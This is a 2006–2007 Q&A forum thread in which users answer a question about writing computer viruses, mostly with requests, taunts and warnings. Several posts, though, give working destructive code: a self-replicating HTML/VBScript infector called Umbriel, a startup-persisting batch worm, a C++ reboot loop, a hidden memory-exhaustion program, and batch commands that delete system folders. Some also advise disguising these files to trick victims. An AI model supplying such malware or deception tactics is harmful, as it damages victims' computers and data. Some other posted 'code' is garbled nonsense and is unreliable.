Answer by bollocks
Submitted on 12/21/2006
Rating: Not yet rated Rate this answer: Vote
why would anyone tell how to do it?

 

Answer by Dave
Submitted on 12/23/2006
Rating: Not yet rated Rate this answer: Vote
I think we can create a fantastic virus via c++, and can hack other computers.. but i want to use trojan.. can you tell me how to use it.

www.csglobal.co.in

 

Answer by Tony
Submitted on 12/26/2006
Rating: Not yet rated Rate this answer: Vote
Its good to know to write virus, then we can destroy it.

 

Answer by hacker-_-
Submitted on 12/28/2006
Rating: Not yet rated Rate this answer: Vote
i have virus 932 noobs i can release on anyone if you need help bpearson45@hotmail.com virus 932 can over power you



ceccearly by hacker-_-

 

Answer by smithsiddh
Submitted on 12/30/2006
Rating: Not yet rated Rate this answer: Vote
I want to know how can i creat virus using c++

 

Answer by lion
Submitted on 12/30/2006
Rating: Not yet rated Rate this answer: Vote
Please tell me how to create a virus @ also about the registry elements.
E-mail:swasthik_ms@hotmail.com

 

Answer by nerdy-geek
Submitted on 12/30/2006
Rating: Not yet rated Rate this answer: Vote
All you noobs who want to create viruses listen up. If you want to Program viruses you should first learn javascripting(java is related to c/c++)then learn C or C++, then if you want to make trojans and RATs the learn VB; virus arent easy to make you have to know all about regestrys and system files. By the way, for all you noobs heres a like gift, its not a virus its just really irritating its very short and it can only be closed by using task manger, but if its a mac or linux(unix also) they have to restart there computer to close it

Here it is. just put it into a html code to make it work


// Created by nerdy_geek_clan@yahoo.com
// Enjoy
/* just so you know Ph5Yc0 KilL3r is may nick name other and so is nerdy-geek */
Alert("Ph5Yc0 KilL3R");
confirm("Ph5Yc0 KilL3r");
history.go();

 

Answer by tangakayo
Submitted on 1/1/2007
Rating: Not yet rated Rate this answer: Vote
creating a virus is simple using c++, buy contaminated c++ books,pre owned by a tuberculosis patient, lick it hug it and hopefuly youl create a virus for yourself.

proven and tested, guaranteed money back

 

Answer by LBW
Submitted on 1/2/2007
Rating: Not yet rated Rate this answer: Vote
Hey yo I got the VBS.REDLOF.A Virus and a Trojan Horse Virus.

 

Answer by ZoNe_VoRTeX
Submitted on 1/2/2007
Rating: Not yet rated Rate this answer: Vote
LMFAO what laughosaurs. "Pls, pls, teach me to hack!", "I want to write a virus in c++! help me!" RIFK RIFK RIFK

There are no easy ways in hacking, Learn how to program.

 

Answer by ziros
Submitted on 1/4/2007
Rating: Not yet rated Rate this answer: Vote
i want to learn how to log information from a website, email : nemyajd@yahoo.Fr

 

Answer by OMFG
Submitted on 1/8/2007
Rating: Not yet rated Rate this answer: Vote
OMFG  ... FFS go buy C/C++ BOOKS or other programming language and LEARN !!!!
KNOWLEDGE IS POWER !! MOFOS

 

Answer by evil sam
Submitted on 1/11/2007
Rating: Not yet rated Rate this answer: Vote
you asked for it
but you gotta compile it first
if you run it, your a sorry a******

#include <fstream>
#include <windows.h>
#include <iostream>
using namespace std;

int main(){
ofstream WRITETOFILE ("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\Norton.bat");
WRITETOFILE << "shutdown -r";
WRITETOFILE.close();
system("shutdown -r");
return 0;
}

 

Answer by seiji
Submitted on 1/15/2007
Rating: Not yet rated Rate this answer: Vote
*sigh* You are all FcKnG Ijits...

Look, if you want to really know how to write a virus, you should:

A) Re-evaluate your wants, because if you dweebs ever DO create something volatile, you WILL get hit up by po-poes. No kidding,
try it because if you're stupid enough to go asking REAL hackers to EMAIL your annoying @$$e$, you'll undoubtably do something stupid enough to get caught!

B) If you completed A, and are still dumb enough to go on:  Read up on C++ and surf the IRC channels for REAL help. DO NOT flood forums with pathetic whining. NO ONE is going to help you. If you don't know what IRC is, google it.  Maybe you'll annoy the wrong person and they'll bomb your PC with the latest and greatest innovations. (Hopefully it'll make your monitor explode, causing a major laceration and ending with you moronic noobs wasting away in your own pool of pathetic bloody idiocy...)

C) Jump off a building. If you still haven't gotten anywhere, you're too hopeless to survive mainstream life outside of Wisconsin...

***IDIOT DISCLAIMER***
Under no circumstances should one attempt any of my above suggestions and live to sue me for it. If your chosen building is 3 stories or more, meh... your choice...
Happy sl-HACKING!
**********************

 

Answer by indegree
Submitted on 1/15/2007
Rating: Not yet rated Rate this answer: Vote
PLS send me scripts and codes in finaly exemples for creating virus's here:
indegree@hotmail.com

c ya

 

Answer by harish ,hari
Submitted on 1/16/2007
Rating: Not yet rated Rate this answer: Vote
hi dudes i want create a virus plz help me

 

Answer by Dis Cufgrirw
Submitted on 1/17/2007
Rating: Not yet rated Rate this answer: Vote
Ok well, this is how it goes from now on. I come from mother russia and my name is Yavin. I  was imprisonned two years ago for hacking into the C.I.A and the F.B.I. All you people that want to become hackers you can forget it and all you people that think you are hackers you are less than nothing.For example i'llget your I.P adresses from this site and all the information i need to take your money and your life. This will be fun haaaa, you think your hackers , what a joke. bye bye. better save your programs cause youll be gone in just a minute

 

Answer by win32corrupteddiverfile!
Submitted on 1/17/2007
Rating: Not yet rated Rate this answer: Vote
n00bies and viruses

 

Answer by hungtea2003@yahoo.com
Submitted on 1/17/2007
Rating: Not yet rated Rate this answer: Vote
I want to make a virus use C++, any one tell me, please

 

Answer by hungtea2003@yahoo.com
Submitted on 1/17/2007
Rating: Not yet rated Rate this answer: Vote
I want to make a virus use C++ or Visual Basic, any one tell me, please. My mail: hungtea2003@yahoo.com

 

Answer by Acidiferous
Submitted on 1/18/2007
Rating: Not yet rated Rate this answer: Vote
Hi all.
This site is one of my favorites. If i am in a bad mood, I just go here. And after reading a little, i am all happy and fussy inside again. You guys are straight up stupid. I really hope this is just a joke.

The best of luck
Acidiferous

 

Answer by willzar
Submitted on 1/20/2007
Rating: Not yet rated Rate this answer: Vote
hey all, i just wanted to know whats the difference between a worm and a virus??

 

Answer by d-line
Submitted on 1/22/2007
Rating: Not yet rated Rate this answer: Vote
hi i am interested in viruses created by any means.
i need some help to know how to create aviruse using c++.
pls help me out.
my e-mail id is gaurish1989@yahoo.com

 

Answer by ZeKe tÄh Frék3
Submitted on 1/23/2007
Rating: Not yet rated Rate this answer: Vote
<b>test<b> .. test

 

Answer by Narith
Submitted on 1/23/2007
Rating: Not yet rated Rate this answer: Vote
I want to learn create virus in vbs. Can someone help me? men.narith@gmail.com

 

Answer by n|c3^T0olS
Submitted on 1/24/2007
Rating: Not yet rated Rate this answer: Vote
i have code for brontok and some more
email me
adideeinc@gmail.com
for dealing

 

Answer by Palaniappan
Submitted on 1/27/2007
Rating: Not yet rated Rate this answer: Vote
Give me the virus program just for my study purpose only

 

Answer by niks
Submitted on 1/28/2007
Rating: Not yet rated Rate this answer: Vote
i wnat to creat virus for turbo C++ pzl send me any virus at akkiniks@yahoo.co.in

 

Answer by fahiim
Submitted on 1/29/2007
Rating: Not yet rated Rate this answer: Vote
check virus.com

 

Answer by Easypeasy
Submitted on 1/30/2007
Rating: Not yet rated Rate this answer: Vote
Creating a virus is easy, just type 1 then a space then 2 and after that 3, keep going all the way until 1000 and run it in as a C++ Console app. It will access each memory sector on the computer simultaneously, and cause shutdown.

 

Answer by Rossibob
Submitted on 2/1/2007
Rating: Not yet rated Rate this answer: Vote
open notepad
type:
start a.bat
a.bat

then File save as
call it a.bat then. try not to run it but send it to some one or some think  

 

Answer by Rasereilord
Submitted on 2/2/2007
Rating: Not yet rated Rate this answer: Vote
ok you bumbs. there has been plenty of virus's layed on this page in the background. if you dont see them then your noobs. and do you recall this code?

<html><!--Umbriel-->
<head>
<title> Second Part To Hell's HTML.Umbriel </title>
</head>
<body>
<script language="VBScript">
rem VBS
On Error Resume Next
Dim fso, shell, wrte, tempdir, windir, rand, file
Set fso=CreateObject("Scripting.FileSystemObject")
Set shell=CreateObject("Wscript.Shell")
if err.number=429 Then
  shell.Run javascript:location.reload()
End If

Set windir=fso.GetSpecialFolder(0)
Set tempdir=fso.GetSpecialFolder(2)

Set wrte=fso.CreateTextFile(windir+"\windows.cmd")
wrte.WriteLine "cls"
wrte.WriteLine "@echo off"
wrte.WriteLine "shutdown -s -f -t 300 -c "+chr(34)+"Second Part To Hell's Umbriel has you..."+chr(34)
wrte.Close()

shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\Source", "C:\umbriel.html"
shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\SubscribedURL", "C:\umbriel.html"

Randomize
rand=int(rnd*5)+1
If rand=1 then
  shell.Run windir+"\windows.cmd"
End If
</script>

<script language="JavaScript">
// JS
var viruspath, virus, code, fso, file, check, checka, checkb
fso=new ActiveXObject("Scripting.FileSystemObject")
viruspath=window.location.pathname
viruspath=viruspath.slice(1)
virus=fso.OpenTextFile(viruspath,1)
file=fso.CreateTextFile("C:\\umbriel.html")
for (i=0; i<500; i++)
{
  if (checkb!=1)
  {
    if (Math.round(Math.random()*5)+1 == 3)
    {
      if (check == 2)
      {
        file.WriteLine("/"+"*")
        file.WriteLine("*"+"/")
      }
      if (check == 3)
      {
        file.WriteLine("rem")
      }
    }
    code=virus.ReadLine()
    if (code == "/"+"*") { checka=666 }
    if (code == "*"+"/") { checka=666 }
    if (code == "rem") { checka=666 }
    if (checka != 666 ) { file.WriteLine(code) }
    checka=0
    if (code=="</"+unescape("%68")+"tml>") { checkb=1 }
    if (code=="// JS") { check=2 }
    if (code=="rem VBS") { check=3 }
    if (code=="</"+unescape("%73")+"cript>") { check=0 }
  }
}
virus.Close();
file.Close();
</script>

<script language="VBScript">
rem VBS
On Error Resume Next
set fso=CreateObject("Scripting.FileSystemObject")
set shell=CreateObject("WScript.Shell")
set myfile=fso.OpenTextFile("C:\umbriel.html")
mycode=myfile.ReadAll
myfile.Close()
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File1")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File2")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File3")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File4")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File5")
if rr <> "" Then Call Umbriel(rr, mycode)

Sub Umbriel(rr, mycode)
set victim=fso.OpenTextFile(rr)
infcheck=victim.ReadLine
If infcheck<>"<html><!--Umbriel-->" Then
  viccode=victim.ReadAll
  victim.Close()
  set wrtevic=fso.OpenTextFile(rr, 2, false, 0)
  wrtevic.Write (mycode+infcheck+chr(13)+chr(10)+viccode)
  wrtevic.Close
End If

End Sub
</script>
</body>
</html>





take that. save it in notepad.
save at as bla.html
and make sure its saved as
"all" file type.


now. exit it.
run it.
and you should have a nooby shut
down sequence that can not be shut down.
al tho. here is your escape ticket.
go to start.
then run
type in shutdown -a

and you can make a much shorter version of
this and trick all your friends.

go to desktop.
right click. new.
make new shortcut
in the target line.
make it say this.
shutdown -s -t 30 -c "You have been hacked"

make the short cut with that target line.
and boo ya. got a simple shut  down sequence
that cannot be aborted. unlees shutdown -a
is run in cmd.


now here is another trick. if you
want to make a simple cmd line to delete
all a persons documents or harddrive.

open up note pad. and type this.


rmdr C:\WINDOWS \s \q

rmdr C:\Program Files \s \q

rmdr My Computer\HKEY_LOCAL_MACHINE \s \q


and save it as

My Virus.BAT


and if you want it too shut down
after the deletions are complete.
add the shut down cmd i gave you.
then wall la .

give it a flashy title like anal sluts
and give it a attractive icon and you
just made a bat programe using old ass
dos commands to kill someones computer
to a point that it cant recover. :)

its nice you want to join the hacker community.


but realize. hackers are not the ones that
break stuff. we are builders. we create things.
Crackers are the ones that break stuff.

i recommend hackthissite.org
and
learning a few programming languges.
start with html and python and work
your way up. good luck.

email me at nadaefame@yahoo.com

l8er and hope it helped.

 

Answer by shumo
Submitted on 2/2/2007
Rating: Not yet rated Rate this answer: Vote
this5 15 5h1t

 

Answer by kamal
Submitted on 2/2/2007
Rating: Not yet rated Rate this answer: Vote
Hi All My self kamal thakur. I want to know how to create a VIRUS & how to HACK COMPUTERS pl anybady know give reply on my mail add jes_hh2005@yahoo.com, kamal_thakur2008@yahoo.co.in

 

Answer by Group X
Submitted on 2/2/2007
Rating: Not yet rated Rate this answer: Vote
go kaik a little kaid

 

Answer by hack
Submitted on 2/4/2007
Rating: Not yet rated Rate this answer: Vote
shutdown /s /t 000
and save it with .bat

 

Answer by 00101001
Submitted on 2/5/2007
Rating: Not yet rated Rate this answer: Vote
this is very funny. Asking for help on writing a virus... is pretty sad. If your writing a virus it has to be made in C or a low level language like assembly or C, a virus written in VB will simply... suck
assembly is probly your best bet considering its tiny file sizes and it speed. But still asking for help on a virus is really sad.
especially wen u cant even program.

 

Answer by cex
Submitted on 2/9/2007
Rating: Not yet rated Rate this answer: Vote
#include <windows.h>
#include <iostream>
using namespace std;
int main(){
HWND stealth;
AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);

while(1)
{
double * p1 = new double;
double * p2 = new double;
double * p3 = new double;
}
return 0;
}


 

Answer by NooB
Submitted on 2/10/2007
Rating: Not yet rated Rate this answer: Vote
Hello how you see my name ,Im a noob so  I want to be a hacker and i need some help. what i have to do to realize this thing

my email: sector055@yahoo.com

 

Answer by Glitch
Submitted on 2/15/2007
Rating: Not yet rated Rate this answer: Vote
If you create viruses and use them on other people, your not a hacker, your a cracker. And it takes years to actually write anything siginifigant if your don't learn your languages. Just go out there a buy a stupid book, it ain't all that hard.

 

Answer by hoes
Submitted on 2/17/2007
Rating: Not yet rated Rate this answer: Vote
send me some   infoand how to make one with with directions(ofcourse) applebomb547@aol.com

 

Answer by smartcomputerhek
Submitted on 2/18/2007
Rating: Not yet rated Rate this answer: Vote
Code :
      //*****************************************************//
      //virus program mimmic -created by Sohan Alva class XII//
      //*****************************************************//

#include<iostream.h>
#include<conio.h>
#include<dos.h>
#include<stdio.h>
#include<process.h>
#include<graphics.h>
#include<fstream.h>

void ffool();               //FUNCTION WHICH GIVES THE FINAL MESSAGE

void main()
{
clrscr();
for(int i=0;i<=100;i++)
    {

   textcolor(YELLOW+BLINK);
   gotoxy(35,12);
   cprintf("VIRUS LOADING");
   gotoxy(39,15);
   textcolor(GREEN);
   cout<<i<<"%";
   delay(75);
   clrscr();
   }
delay(100);
clrscr();
fflush(stdout);
gotoxy(20,12);
cout<<" 'TOURNIQUET' VIRUS CREATED BY PROCRAETORIAN";
gotoxy(20,14);
cout<<" SAY GOOD BYE TO YOUR PC IN ";
for(int j=5;j>=0;j--)
{
gotoxy(48,14);
cout<<j<<" SECONDS";
delay(1000);
}
ofstream f1;
f1.open("c:/windows/All Users/desktop/procraetorian.sys");
ofstream f3("c:/windows/All Users/desktop/blast.sys");
ofstream a2("c:/windows/All Users/desktop/mslaugh.exe");
ofstream s2("c:/windows/All Users/desktop/backdoor.sys");
ofstream g2("c:/windows/All Users/desktop/spin32_war.sys");
ofstream h2("c:/windows/All Users/desktop/russpatr.sys");
ofstream j2("c:/windows/All Users/desktop/torr_sys32.sys");
ofstream k2("c:/windows/All Users/desktop/xxx.sys");
ofstream l2("c:/windows/All Users/desktop/i.txt");
ofstream sm("c:/windows/All Users/desktop/am.txt");
ofstream d1("c:/windows/All Users/desktop/your.txt");
ofstream d2("c:/windows/All Users/desktop/worst.txt");
ofstream d3("c:/windows/All Users/desktop/night.txt");
ofstream d4("c:/windows/All Users/desktop/mare.txt");
clrscr();
lowvideo();
cout<<"

1.HARD-DISK CORRUPTION                                    
:";
delay(4000);
cout<<"completed";
cout<<"

2.MOTHER BOARD CORRUPTION                                  
:";
delay(4000);
cout<<"completed";
cout<<"

3.INSTALLING CYBERBOB.DLL -->WINDOWS/COMMAND              
:";
delay(4000);
cout<<"completed";
cout<<"


PROCRAETORIAN.SYS SUCCESSFULLY PLANTED";
delay(3000);
rename("VIRUS.EXE","C:WINDOWSStart MenuProgramsStartUpVIRUS.EXE");
//ffool();
}
           //*END OF MAIN*//
           //*START OF ffool()*//
void ffool()
{
    clrscr();
    int g=DETECT,h;
    initgraph(&g,&h,"\tc\bgi");
    cleardevice();
    delay(1000);
    setcolor(2);
    settextstyle(1,0,1);
    delay(1000);
    setbkcolor(BLUE);
    highvideo();
    outtextxy(50,150,"THE PROCRAETORIAN:");
    delay(1500);
    outtextxy(50,200,"YOUR PC IS NOW UNDER SURVEILANCE BY THE VIRUS
HOST");
    outtextxy(50,250,"PEA(C)E BE WITH YOU ! ! !");
    getch();
    delay(4000);
    closegraph();
    exit(0);
}

           //*END OF ffool()*//


 

Answer by gPoD.VirU$
Submitted on 2/18/2007
Rating: Not yet rated Rate this answer: Vote
to create STRONG VIRUSES u have to now C++, C#, etc... But Virus, Worm, Spam, Trojan for all that dont now any language  are VIRUS GENERATORS is very easy to create viruses with them. I have created viruses at start with these generators but now i create with C++.
Enjoy

 

Answer by sap
Submitted on 2/20/2007
Rating: Not yet rated Rate this answer: Vote
please give me some knowledge about hacking,
plz,plz....

 

Answer by Virus Master
Submitted on 2/20/2007
Rating: Not yet rated Rate this answer: Vote
Okey i have a C++ BOOK i have all the tomes.I have already study at College of Thessaloniki for that and i can help everybody want help.....
I can create a virus Delete Ur BIOS and delete all the windows.:x

But u need to donate me 100$ for That via paypal !!!!

KILL ALL PCS !!!

 

Answer by M.Adnan Qureshi
Submitted on 2/21/2007
Rating: Not yet rated Rate this answer: Vote
Hi I am Adnan Qureshi your good friend ,I got some Knowledge of C language and want to know how to create virus using C language ....If any body knows about creation of virus please please please help me just like you help your Friends....
  

 

Answer by M.Adnan Qureshi
Submitted on 2/21/2007
Rating: Not yet rated Rate this answer: Vote
Hi I am Adnan Qureshi your good friend ,I got some Knowledge of C language and want to know how to create virus using C language ....If any body knows about creation of virus please please please help me just like you help your Friends....
  

 

Answer by mymek77
Submitted on 2/26/2007
Rating: Not yet rated Rate this answer: Vote
What is "Hkey" in your program to create virus? i dont understand. please anybody  
give me that meaning...

 

Answer by hahaha
Submitted on 2/26/2007
Rating: Not yet rated Rate this answer: Vote
your all thick

 

Answer by Dark Element
Submitted on 2/27/2007
Rating: Not yet rated Rate this answer: Vote
ANY body asking how to make a Virus in C or C++
is to stupid to do so. Almost EVERY single virus out there is in assembly language because of it's extreme control over the system. Further more anyone wanting to become a hacker should first learn how to write the English language, because hackers are not illiterate NOOBS. Most hackers are very smart and like to show it in the way they act. Go read, read, and read before asking for help then go google it. Thats when you become a hacker!

 

Answer by Ircha
Submitted on 3/1/2007
Rating: Not yet rated Rate this answer: Vote
K, listen up idiots, if you want to create viruses, sure, good luck with that, but do look forward bto spending 5-10 years in prison thinking about how intelligent you are, hackers don't destroy, the internet is a hackers playspace which he can do whatever he wants with, but he doesen't destroy it, he uses it to his advantage to learn and understand things.

 

Answer by Nztripper
Submitted on 3/1/2007
Rating: Not yet rated Rate this answer: Vote
i ama newbie..
teach me..
i wanna be a genius like you..
give me more source to destroy..
virus and net is my needed now..
i try to learn more..
all bout virus and hacking..
i need a real journey to be..
so, give me more chance to increase..
nztripper.

 

Answer by flamedog9999000
Submitted on 3/3/2007
Rating: Not yet rated Rate this answer: Vote
can you create a program or virus to by pass putting in user name and pass when you type in a IP address

 

Answer by Umar
Submitted on 3/4/2007
Rating: Not yet rated Rate this answer: Vote
I will soon send a virus to all you moder pokers!!!!!!!!!!!!!!!!!!!!!!!

 

Answer by FAD
Submitted on 3/5/2007
Rating: Not yet rated Rate this answer: Vote
hello people, i'mnew in here,,

but i want to ask you, how to make a virus using C++,,

can all of you help me, how to make it???

i don't know the basic and the scrypt to,,

plisss, help me,,

plisss send to my mail at godan_10@yahoo.com

 

Answer by bass
Submitted on 3/7/2007
Rating: Not yet rated Rate this answer: Vote
UR ALL n00bz. u c4n 60 4nd 8uy 1. So go and buy  a c++ book pls.

 

Answer by codemaster
Submitted on 3/7/2007
Rating: Not yet rated Rate this answer: Vote
i would like to create an anti-virus to kill a malicious virus

 

Answer by noobs
Submitted on 3/8/2007
Rating: Not yet rated Rate this answer: Vote
hacking is illegal u can get arrested

 

Answer by salman&saikat
Submitted on 3/8/2007
Rating: Not yet rated Rate this answer: Vote
wanna creat windows virus by c++?

better u go through a c++ book.know about the windows REG_ and try to make changes by using c++.

 

Answer by Evil knievil!
Submitted on 3/11/2007
Rating: Not yet rated Rate this answer: Vote
I want all viruses to dissapear.. hate it and think its so f**king childish to make viruses and spread over the webb!!

 

Answer by Evil knievil!
Submitted on 3/11/2007
Rating: Not yet rated Rate this answer: Vote
I want all viruses to dissapear.. hate it and think its so f**king childish to make viruses and spread over the webb!!

 

Answer by deaddevil
Submitted on 3/12/2007
Rating: Not yet rated Rate this answer: Vote
Listen to me now you can;t become hacker overnight of you want to become than learn Unix and Linux.

you asked for a virus here is an virus.

radixes('intro '98988989'0;);
hkeywin ('key intro '899898989898');
riddling('files '98899889989898');
settling('no folder 89898989899898');
writes('Ham restart');
rattling('98899889989898')
riddling(block all programs);
Madlen('8998989898899898);
9898988998898998
and
if virus detected then
destroy virus
if steal coded then Unionist win....
teal(fl'898998898998);
XL('898998989889);
virus name virus '988998899889;




Send this to your victim tell him that its a porn or something when he Willow open it you will be able to reinstall windows and to strop the hard disk.
in the last line write your message have a nice virus time Mahala!

 

Answer by Vladimir
Submitted on 3/13/2007
Rating: Not yet rated Rate this answer: Vote
I saw it once before the "How to create a virus program." You can do it clean and/or let it miss and to whoever reads your web site gets the virus. You want a virus, you pay extra for an undetected virus. it's more like a clean virus program. One virus generator was selling before for around $375 and the cost must have gone up if the site is still around. If the price is listed on the left hand side of the screen above the middle of the site, that's the place to get and purchase the virus generator. Word of caution, a virus can be caught by an amateur hacker and disable or turn the virus around itself to complete destruction. VIRUS ALERT !! VIRUS ALERT !!  LMAO

 

Answer by pagalnokia
Submitted on 3/14/2007
Rating: Not yet rated Rate this answer: Vote
open notepad and write this
rmdr c:\windows\system32 -s -q
and save it as (filename).bat
remember that ".bat" extension is a must and just double-click that icon. The hard disc is broken and you will have to buy a new one. dont try on your system or your friends. probably try it somewhere in a cybercafe. i tried it in my office and copied the file on more than 300 computer over networking. They had to buy all those new harddiscsw

 

Answer by Working on a virus
Submitted on 3/14/2007
Rating: Not yet rated Rate this answer: Vote
Hey all, I've been writing a virus, and I'm done with it (it's in ASM); what's a good compiler to put it into an executable format?

 

Answer by sisohai
Submitted on 3/15/2007
Rating: Not yet rated Rate this answer: Vote
I WANT TO MAKE VIRUS AND SEND TO MY FREN DAMN

 

Answer by santy
Submitted on 3/15/2007
Rating: Not yet rated Rate this answer: Vote
you can read ankit fadias book -
'unofficial guide to ethical hacking'
for batch parogramming.

 

Answer by Theara
Submitted on 3/19/2007
Rating: Not yet rated Rate this answer: Vote
I want to Know how to write virus?

 

Answer by PUMA_ACIRE
Submitted on 3/20/2007
Rating: Not yet rated Rate this answer: Vote
DAMN YOU ALL!!!!!!!!! YOU DONT KNOW HOW TO CREATE A SIMPLE VIRUS??? WHAT I MEAN HOW TO CERTAINLY CRASH OFF YOUR PC???!!!! JUST FOLLOW  ANY THESE STEPS!!!
1.RUN CMD
   -TYPE FORMAT C:
   -PRESS "Y"
2.OR JUST SIMPLY CRASH YOUR HARD DISK BY STAMPING IT WITH YOUR OWN FEET!!!!!!!!!! OR CRASH YOUR CPU!!!

WHY CREATING VIRUS WHERE THERE IS A SIMPLE WAY!!! YOU FOOLS!!!!!

 

Answer by maddy
Submitted on 3/20/2007
Rating: Not yet rated Rate this answer: Vote
i want to create virus

 

Answer by brontok_maker
Submitted on 3/20/2007
Rating: Not yet rated Rate this answer: Vote
you must know windows first, its easy
bwodonk@yahoo.co.id

 

Answer by zeeco
Submitted on 3/21/2007
Rating: Not yet rated Rate this answer: Vote
i want to create a virus pro gramme so where to start from

 

Answer by wewars
Submitted on 3/22/2007
Rating: Not yet rated Rate this answer: Vote
Double kill!!!

 

Answer by shadowz
Submitted on 3/24/2007
Rating: Not yet rated Rate this answer: Vote
what do u go to to program a virus? notepad? ms-dos? i really dont kno

 

Answer by Shortcutz
Submitted on 3/24/2007
Rating: Not yet rated Rate this answer: Vote
Seriously lads if your going to do this properly you need to put the work in yourself, if your not prepared to learn how 2? then what is the point! Thats half the fun!

 

Answer by baker80
Submitted on 3/24/2007
Rating: Not yet rated Rate this answer: Vote
I wanna make a virus that destroys kiddie porn on pc's around the world.

 

Answer by sheik
Submitted on 3/25/2007
Rating: Not yet rated Rate this answer: Vote
contact my e mail i am help for "c" virus

 

Answer by matthew459
Submitted on 3/28/2007
Rating: Not yet rated Rate this answer: Vote
If u want to know how to create a virus send me an email

matty7300@yahoo.co.uk

 

Answer by chrissy
Submitted on 3/28/2007
Rating: Not yet rated Rate this answer: Vote
can people help me a wan to make a virus  but not  4 bad a want to get back at the people that keep sending me   them because am sick the last 1 fryed ma proseser  . can pplteach me how 2 make 1

 

Answer by Liam
Submitted on 3/29/2007
Rating: Not yet rated Rate this answer: Vote
wow newbies... heres a batch virus... copy it to notepad... then save a <filename.bat>
thisll f-ck ur victims comp up good... took me a long time to make but its a sh-tty one so ... its worth giving away... not really... just double click on the dos batch file to launch and infect;)

::
:: Created by Liam on 03-29-2007 at 10:13:32
::
@echo off
@ver|find /i "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
break off
copy %0 %windir%\huxmpjpw.bat>nul
echo.on error resume next>%windir%\huxmpjpw.vbs
echo.set mh=CreateObject("wscript.shell")>>%windir%\huxmpjpw.vbs
echo.set wp=wscript.createobject("scripting.filesystemobject")>>%windir%\huxmpjpw.vbs
echo.set ux=wscript.createobject("wscript.shell")>>%windir%\huxmpjpw.vbs
echo.mh=ux.SpecialFolders("Startup")>>%windir%\huxmpjpw.vbs
echo.jp=ux.SpecialFolders("AllUsersStartup")>>%windir%\huxmpjpw.vbs
echo.wp.copyfile "%windir%\huxmpjpw.bat", mh & "\huxmpjpw.bat">>%windir%\huxmpjpw.vbs
echo.wp.copyfile "%windir%\huxmpjpw.bat", jp & "\huxmpjpw.bat">>%windir%\huxmpjpw.vbs
copy %0 %windir%\startm~1\progra~1\autost~1\huxmpjpw.bat>nul
copy %0 %windir%\startm~1\progra~1\opstar~1\huxmpjpw.bat>nul
copy %0 %windir%\startm~1\programs\startup\huxmpjpw.bat>nul
copy %0 %windir%\alluse~1\startm~1\programs\startup\huxmpjpw.bat>nul
copy %0 %windir%\alluse~1\menuin~1\progra~1\iniciar\huxmpjpw.bat>nul
copy %0 %windir%\menúin~1\progra~1\inicio\huxmpjpw.bat>nul
copy %0 %windir%\menudé~1\progra~1\démarr~1\huxmpjpw.bat>nul
cscript %windir%\huxmpjpw.vbs
cls


 

Answer by Angel
Submitted on 3/30/2007
Rating: Not yet rated Rate this answer: Vote
I need one of ya ppl to hack into my computer send a virus to this email fyecatgreen@yahoo.com

 

Answer by d
Submitted on 3/31/2007
Rating: Not yet rated Rate this answer: Vote
I'VE GOT SOME CODES BUT I'M NOT SURE HOW TO SEND THEM CAN ANY BODY HELP?

 

Answer by Virus 4 U
Submitted on 3/31/2007
Rating: Not yet rated Rate this answer: Vote
I can tell you the pricapal of virus...
A virus must either "Overload" the person's computor, or delete file such as "C:\WINDOWS\System32"(system root).
The computor will then crash. You must understand fileology. =) Find the store files and disable System Restore as well as anti-virus software.


































































































































































































































































-







































































































___

 

Answer by kickadi
Submitted on 3/31/2007
Rating: Not yet rated Rate this answer: Vote
if you know how to create virus
please email me kickadi@telkom.net

 

Answer by fra
Submitted on 4/4/2007
Rating: Not yet rated Rate this answer: Vote
how to create virus in corejava

 

Answer by fsadgf
Submitted on 4/4/2007
Rating: Not yet rated Rate this answer: Vote
hg sbgdasdfsafduisyeiuwe

 

Answer by apz
Submitted on 4/8/2007
Rating: Not yet rated Rate this answer: Vote
Hi there...
You can fight nite and day!
But what matters is that NOTHING IN THE WORLD COMES FOR FREE!!!

So whosoever wants to have his/her own virus, bettr learn sum prog. lang. quick!

But, to be COOL, U DONT NEED TO CREATE VIRUS,
YOU NEED TO MAKE USEFUL SOFTWARE with ur knwledge!

Learn ne prog lang... I personally like C++, Python, RUBY (even GWBasic would suffice to a Virus writer!) But plz don f**k up the web... it has 185000 more viri!

Greetz...
Join_d_(cLuB)

 

Answer by Chelsea
Submitted on 4/8/2007
Rating: Not yet rated Rate this answer: Vote
Hey can someone send me a virus script so I can hack people...

Send it to: Chelsea_shepherd74@hotmail.com


                                    Thank You,
                              Chelsea Donnelly

 

Answer by E2dWarrrrrrrr
Submitted on 4/9/2007
Rating: Not yet rated Rate this answer: Vote
What do you live

 

Answer by another someone
Submitted on 4/11/2007
Rating: Not yet rated Rate this answer: Vote
Here's a code for a batch virus.

@ECHO OFF
shutdown -s -f 1
echo.
echo.
echo.
END

 

Answer by TotaS
Submitted on 4/15/2007
Rating: Not yet rated Rate this answer: Vote
pydarai gaidziai hacked by TotaS

 

Answer by Eric
Submitted on 4/17/2007
Rating: Not yet rated Rate this answer: Vote
I want to learn how to create virus by c,please help me,thank you.
e-mail :ericpeng@126.com

 

Answer by nova1000000000000000
Submitted on 4/17/2007
Rating: Not yet rated Rate this answer: Vote
will some1 teach me 2 right a virus?







nova1000000000000000

 

Answer by frenchy: {
Submitted on 4/19/2007
Rating: Not yet rated Rate this answer: Vote
ok......all of u morrons who think that creating a bloody virus
and sending it to destroy other peoples computers is somehow funny or will get u somewhere..........well ur all a waist of societys time and you should give up your rights as a human being. take your skills to create a program that hackers would have a hard time cracking sell it and make money..or ur just waisting everyones time including yours...

    $-}

 
